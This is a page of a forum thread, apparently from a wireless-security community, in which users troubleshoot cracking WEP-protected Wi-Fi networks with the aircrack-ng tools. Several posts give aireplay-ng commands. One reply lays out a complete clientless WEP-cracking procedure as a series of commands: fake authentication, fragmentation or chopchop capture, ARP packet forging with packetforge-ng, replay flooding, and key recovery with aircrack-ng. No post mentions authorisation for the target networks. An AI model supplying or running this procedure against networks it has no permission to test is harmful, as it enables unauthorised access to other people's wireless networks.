Page 2 of 2 FirstFirst 12
Results 11 to 16 of 16

Thread: Only Beacons no IV's

  1. #11
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    4

    Default

    I start of with

    airodump-ng -c 6 -w name --bssid bssid wlan0

    Then for the injection i start of with the -1 0 command. (Don't know what it does though..)

    aireplay-ng -1 0 -a bssid -h mymac wlan0

    This only works sometimes though, and since I don't know what it does, I don't know why = / (If it doesn't work it just says "Sending Aithentication Request (Open System)) Over and over again.

    aireplay-ng -3 -b bssid -h mymac wlan0

    That last command doens't make the beacons nor the IV's go any faster..
    Will try the -4 -5 command later on.
    Thanks for any info about this.

    hugs

  2. #12
    Member
    Join Date
    Mar 2007
    Posts
    204

    Default

    Ok i made some red comments

    Quote Originally Posted by Sinom View Post
    I start of with

    airodump-ng -c 6 -w name --bssid bssid wlan0

    Then for the injection i start of with the -1 0 command. (Don't know what it does though..) fake authentication

    aireplay-ng -1 0 -a bssid -h mymac wlan0

    This only works sometimes though, and since I don't know what it does, I don't know why = / (If it doesn't work it just says "Sending Aithentication Request (Open System)) Over and over again.

    aireplay-ng -3 -b bssid -h mymac wlan0 your trying to replay an arp from a non asoc'd mac. definitly replace this with either -4 or -5

    That last command doens't make the beacons nor the IV's go any faster..
    Will try the -4 -5 command later on.
    Thanks for any info about this.

    hugs

  3. #13
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    8

    Default

    if there are no clients on the network, my choice of attack would either be the --chopchop or the --fragment to get the data necessary for packetforge to build a custom ARP packet.

    You could then spam this to the AP using aireplay-ng while sniffing with airodump ( filtered by BSSID of course)

  4. #14
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default

    I'll show you how I run a clientless attack but be aware this takes more time.

    First ill Authenticate to make sure i can. Use your wireless interface as appropriate, mine is ath0 yours could be different.

    Code:
    aireplay-ng -1 0 -e ESSID -a APMAC -h MYMAC ath0
    Once I authenticate I run it again but this time I make it send the keep-alive packet every 30 seconds (because getting the right packet can take time I want to ensure I stay authenticated this may not be necessary)

    Code:
    aireplay-ng -1 0 -q 30 -e ESSID -a APMAC -h MYMAC ath0
    Next, I start looking for that ARP packet using a fragmentation technique

    Code:
    aireplay-ng -5 -b APMAC -h MYMAC ath0
    Hit Y when the screen promts.

    If that fails for too long you can try the chop chop technique its -4 instead of -5 and you switch the -b and -h around.

    Once i get the right packet I use packetforge Note the *.xor fragment file

    Code:
    packetforge-ng -0 -a APMAC -h MYMAC -k 255.255.255.255 -l 255.255.255.255 -y fragmentfile.xor -w arp_request
    Then you want to use tcpdump(I forget exactly what this does, it has something to do with your forged packed used in the previous code.)

    Code:
    tcpdump -n -vvv -e -s0 -r arp_request
    Now is when you want to start Sniffing for those ivs so when we start the next part its already setup for us

    Code:
    airodump-ng -c CHANNEL -bssid APMAC -ivs -w capture ath0
    Now we start forcing that AP to kick some serious packets out so we can catch all the ivs

    Code:
    aireplay-ng -2 -r arp_request ath0
    Get a whole bunch I just let it run for a while. Theres a specific # you want to look for comparatively to the -bit encryption the AP is using but the more the better anyways.

    Now we try to crack it!

    Code:
    aircrack-ng *.ivs -b APMAC
    If you didn't get enough ivs you can always read some more with the packets you made earlier!

    I'm always looking for suggestions myself, although I haven't even bothered with this wifi stuff for a while I am still open for suggestions and comments.
    Now that I typed all that out I hope it all still applies, this is actually more for BT2 and I run off the cd not a HD.

  5. #15
    Member
    Join Date
    Mar 2007
    Posts
    204

    Default

    The tcpdump command is not needed for this attack to work.

  6. #16
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default

    Quote Originally Posted by merlin051 View Post
    The tcpdump command is not needed for this attack to work.
    I've been testing this and have found that without the tcpdump command the data packets are very very slow. But once I use tcpdump the data packets increment at an incredible rate. I've tried this with a 2wire and a linksys wireless router.

    I'm wondering if there was something else you've done that didn't require the tcpdump command?

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •